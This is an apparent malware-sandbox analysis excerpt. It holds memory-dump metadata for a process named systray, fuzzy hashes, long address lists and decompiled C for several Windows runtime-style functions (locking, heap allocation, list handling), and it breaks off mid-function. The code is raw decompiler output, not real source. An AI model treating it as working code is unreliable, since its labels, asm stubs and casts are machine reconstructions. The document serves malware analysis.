0x045c5195
0x04606db1
0x04606db5
0x04606db9
0x045c519b
0x045c519b
0x045c519e
0x045c51a7
0x045c51a9
0x045c51a9
0x045c51b5
0x045c51b8
0x045c51bb
0x045c51be
0x045c51c1
0x045c51c5
0x045c51c9
0x045c51cd
0x045c51cd
0x045c51d8
0x045c51dc
0x045c51e0
0x04606dcc
0x04606dd0
0x04606dd5
0x04606ddd
0x04606de1
0x04606de1
0x04606de5
0x04606deb
0x04606df1
0x04606df7
0x04606dfd
0x04606e01
0x04606e05
0x04606e09
0x04606e0d
0x04606e11
0x04606e11
0x045c51eb
0x04606e1a
0x04606e1f
0x04606e21
0x04606e23
0x00000000
0x045c51f1
0x045c51f1
0x00000000
0x045c51f1

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ff3c1aeec6b2be93ce1ec88f5f7196a9811bef41c156ae325b95f7a6404ba5
Instruction ID: 254cb37e5e21d922476680eb24b2abaf7479447137a2ca197cbbae888d907f38
Opcode Fuzzy Hash: 09ff3c1aeec6b2be93ce1ec88f5f7196a9811bef41c156ae325b95f7a6404ba5
Instruction Fuzzy Hash: 16C136755083819FD354CF68C580A5AFBF1BF88304F14896EF9998B392E771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 045952A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E045952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E045AEEF0(0x46879a0);
					_t104 =  *0x4688210; // 0x442bd8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E045AEB70(_t93, 0x46879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E045D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E045AEEF0(0x46879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E045AEB70(0, 0x46879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x442be5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E045CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E045AEEF0(0x46879a0);
									__eflags =  *0x4688210 - _t104; // 0x442bd8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4688210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04614888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E045AEB70(_t95, 0x46879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E045D95D0();
											L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E045D95D0();
											L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E045AEB70(_t93, 0x46879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E045D95D0();
										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E045D95D0();
										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E045CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x045952a5
0x045952ad
0x045952b0
0x045952b3
0x045952b7
0x045952ba
0x045952bf
0x045952c4
0x045952cc
0x00000000
0x00000000
0x045952ce
0x045952d9
0x045952dd
0x045952e7
0x045952f7
0x045952f9
0x045952fd
0x045f0dcf
0x045f0dd5
0x045f0dd6
0x045f0dd7
0x045f0dd8
0x045f0dd9
0x045f0dde
0x045f0ddf
0x045f0de0
0x045f0de1
0x045f0de2
0x045f0de5
0x045f0dea
0x045f0dec
0x045f0f60
0x045f0f64
0x045f0f70
0x045f0f76
0x045f0f79
0x045f0f79
0x00000000
0x045f0f64
0x045f0df2
0x045f0df7
0x045f0e04
0x045f0e0d
0x045f0e0d
0x045f0e10
0x045f0e1a
0x045f0e1c
0x045f0e4c
0x045f0e52
0x045f0e61
0x045f0e67
0x045f0e6b
0x045f0e70
0x045f0e76
0x045f0ed7
0x045f0edc
0x045f0ee0
0x045f0ee6
0x045f0eea
0x045f0eed
0x045f0ef0
0x045f0ef3
0x045f0ef6
0x045f0ef9
0x045f0efe
0x045f0f01
0x045f0f01
0x045f0f0b
0x045f0f12
0x045f0f16
0x045f0f18
0x045f0f1b
0x045f0f2c
0x045f0f31
0x045f0f31
0x045f0f35
0x045f0f39
0x045f0f3a
0x045f0f3c
0x045f0f3f
0x045f0f50
0x045f0f55
0x045f0f55
0x045f0f59
0x045952eb
0x045952f1
0x045952f1
0x045f0e7d
0x045f0e84
0x045f0e88
0x045f0e8a
0x045f0e8d
0x045f0e9e
0x045f0ea3
0x045f0ea3
0x045f0ea7
0x045f0eaf
0x045f0eb3
0x045f0eb9
0x045f0eb9
0x045f0ebc
0x045f0ecd
0x045f0ecd
0x00000000
0x045f0eb3
0x045f0e21
0x045f0e2b
0x045f0e2f
0x045f0e30
0x045f0e3a
0x045f0e3f
0x045f0e41
0x00000000
0x00000000
0x045f0e47
0x00000000
0x045f0e47
0x045f0df9
0x045f0dfe
0x00000000
0x00000000
0x00000000
0x045f0dfe
0x04595303
0x04595307
0x00000000
0x04595309
0x00000000
0x04595309
0x04595307
0x045952e9
0x045952e9
0x00000000
0x045952e9
0x0459530e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9feabb14bdc7d8f74ab05fc440fa58bcebdd33acc83e41c19e26fef78950eee
Instruction ID: 7e45d85369b5935c0f4b2a300f588ae86faadc2dae9cc583b23a44e856d90071
Opcode Fuzzy Hash: f9feabb14bdc7d8f74ab05fc440fa58bcebdd33acc83e41c19e26fef78950eee
Instruction Fuzzy Hash: 8551DD71205342ABEB21AF28C841B2BBBE4FF84B14F14092DE59587691E770F814EB92

Uniqueness

Uniqueness Score: -1.00%

Function 045AEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E045AEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04599080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04592D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x045aef4b
0x045aef4d
0x045aef57
0x045af0bd
0x045af0c2
0x045af0d2
0x045af0d2
0x045af0c2
0x045aef5d
0x045aef5f
0x045aef67
0x045aef6a
0x045aef6d
0x045aef74
0x045aef7f
0x045aef82
0x045aef82
0x045aef86
0x045aef88
0x045aef8c
0x045aef8f
0x045aef8f
0x045aef8f
0x00000000
0x045aef91
0x045aef93
0x045aefc4
0x045aefc4
0x045aefc4
0x045aefca
0x045aefd0
0x045af0a6
0x00000000
0x00000000
0x045af0af
0x045fbb06
0x045fbb0a
0x045af0b5
0x045af0b5
0x045af0b5
0x045af0b5
0x00000000
0x045aefd6
0x045aefd9
0x045af0de
0x045af0e2
0x045aefdf
0x045aefdf
0x045aefdf
0x045aefe5
0x045fbafc
0x045fbafc
0x045aefe5
0x045aefeb
0x045aefed
0x045af00f
0x045af011
0x045af01a
0x045af01d
0x045af021
0x045af028
0x045af029
0x045af029
0x045af02c
0x00000000
0x045af02c
0x045aeff3
0x045aeff9
0x045af0ea
0x045af0ed
0x045af0ef
0x00000000
0x045af0ef
0x045af003
0x045fbb12
0x045af045
0x045af049
0x045af051
0x045af09e
0x045af0a0
0x045af0a0
0x045af09e
0x045af053
0x045af064
0x045af064
0x045af06b
0x045fbb1a
0x045fbb1a
0x045af071
0x045af071
0x045af07d
0x045af082
0x045af08f
0x045af08f
0x045af009
0x045af00d
0x00000000
0x045af00d
0x045aefd0
0x045aef97
0x045aefa5
0x045aefaa
0x00000000
0x045aefac
0x045aefac
0x045aefac
0x00000000
0x045aefb2
0x045af036
0x045af03a
0x045af040
0x045af090
0x00000000
0x045af092
0x045af042
0x00000000
0x045af042
0x045aefb7
0x045aefb9
0x045aefbc
0x045aefb0
0x045aefb0
0x00000000
0x045aefbe
0x045aefbe
0x045aefc1
0x00000000
0x045aefc1
0x045aefbc
0x045aefaa
0x045aef91

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: b2a70a712138cd702a1e615a0739e5d12d50b79be489dade7cacd99a6fff3da7
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 89512231A04249EFDB20CF68D0C17AEBBB1FF05304F1881A8C64697281D375B9A9E751

Uniqueness

Uniqueness Score: -1.00%

Function 0466740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0466740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E045ED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E045DF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L045B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L045B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E045DF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L045B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0466740d
0x0466740d
0x04667412
0x04667413
0x04667416
0x04667418
0x0466741c
0x0466741f
0x04667422
0x04667422
0x04667428
0x0466742a
0x0466742a
0x04667451
0x04667432
0x0466744f
0x0466744f
0x00000000
0x04667434
0x04667438
0x04667443
0x04667517
0x04667517
0x0466751a
0x04667535
0x04667520
0x04667527
0x0466752c
0x04667531
0x04667533
0x00000000
0x04667533
0x00000000
0x04667531
0x0466754b
0x0466754f
0x0466755c
0x0466755c
0x0466755f
0x04667560
0x04667561
0x04667562
0x04667563
0x04667568
0x0466756a
0x0466756c
0x0466756d
0x0466756d
0x0466756f
0x04667572
0x04667574
0x04667577
0x0466757c
0x0466757f
0x00000000
0x04667551
0x04667551
0x04667551
0x04667553
0x04667553
0x04667449
0x04667449
0x0466744c
0x0466744c
0x00000000
0x0466744c
0x04667443
0x0466750e
0x04667514
0x04667514
0x04667455
0x04667469
0x0466746d
0x00000000
0x04667473
0x04667473
0x04667476
0x04667480
0x04667484
0x0466748e
0x04667493
0x04667493
0x04667496
0x04667499
0x046674a1
0x046674b1
0x046674b5
0x00000000
0x046674bb
0x046674c1
0x046674c1
0x046674c4
0x046674c5
0x046674c6
0x046674c7
0x046674c8
0x046674cd
0x00000000
0x046674d3
0x046674d3
0x046674d6
0x046674d8
0x046674db
0x046674dd
0x046674e0
0x046674e7
0x046674ee
0x046674ee
0x046674f4
0x046674f9
0x00000000
0x046674fb
0x046674fb
0x046674fd
0x04667500
0x04667503
0x04667505
0x04667505
0x046674f9
0x00000000
0x046674cd
0x046674b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 52e3170a1fa7f268feaef460a4b84cb3a5ccd7c35db1c36aef47ae420c1987c4
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 95517C71600606EFDB25CF14D480A96BBB5FF45309F15C1AAE9099F222E771FA46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 045C4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E045C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x468d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E045DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4687bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E045DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L045B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0459CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E045DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E045DF380(_t67 + 0xc, 0x4575138, 0x10) == 0) {
								 *0x46860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E045C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E045C4E70(0x46886b0, 0x45c5690, 0, 0) != 0) {
					_t46 = E0459CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x045c4d3b
0x045c4d4d
0x045c4d53
0x045c4d58
0x045c4d65
0x045c4d6c
0x045c4d71
0x045c4d77
0x045c4d7f
0x045c4d8c
0x045c4d8e
0x045c4dad
0x045c4db0
0x045c4db7
0x045c4db8
0x045c4db9
0x045c4dba
0x045c4dbb
0x045c4dc1
0x045c4dc8
0x045c4dcc
0x045c4dd5
0x045c4dde
0x045c4ddf
0x045c4de0
0x045c4de1
0x045c4de6
0x045c4de7
0x045c4de9
0x045c4df3
0x00000000
0x00000000
0x04606c7c
0x04606c8a
0x04606c8a
0x04606c9d
0x04606ca7
0x04606cac
0x04606cb2
0x04606cb9
0x00000000
0x04606cbf
0x04606cbf
0x00000000
0x04606cbf
0x04606cb9
0x045c4dfb
0x04606ccf
0x04606cd3
0x045c4e32
0x045c4e39
0x04606ce0
0x04606cf2
0x04606cf2
0x04606ce0
0x045c4e3f
0x045c4e41
0x045c4e51
0x045c4e51
0x045c4e03
0x045c4e03
0x045c4e09
0x045c4e0f
0x045c4e57
0x00000000
0x00000000
0x045c4e1b
0x045c4e30
0x045c4e5b
0x045c4e5b
0x00000000
0x045c4e30
0x045c4e11
0x045c4e11
0x045c4e16
0x00000000
0x045c4e16
0x045c4e01
0x00000000
0x045c4e01
0x045c4da5
0x04606c6b
0x00000000
0x045c4dab
0x045c4dab
0x00000000
0x045c4dab

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83dadc54b71aecd02ee1a47b9ed0e9106112a00b00855f28878f092c71666f6
Instruction ID: 9c9e62601c9ec085dabe832cbde850a7d491a603367dd3c0478c9a6d326c2ffb
Opcode Fuzzy Hash: f83dadc54b71aecd02ee1a47b9ed0e9106112a00b00855f28878f092c71666f6
Instruction Fuzzy Hash: 3241F171A40318AFEB21DF54CD90FAAB7AAFB46704F01409DE8459B280E770FD40EA92

Uniqueness

Uniqueness Score: -1.00%

Function 045D3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E045A7B60(0, _t61, 0x45711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E045A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
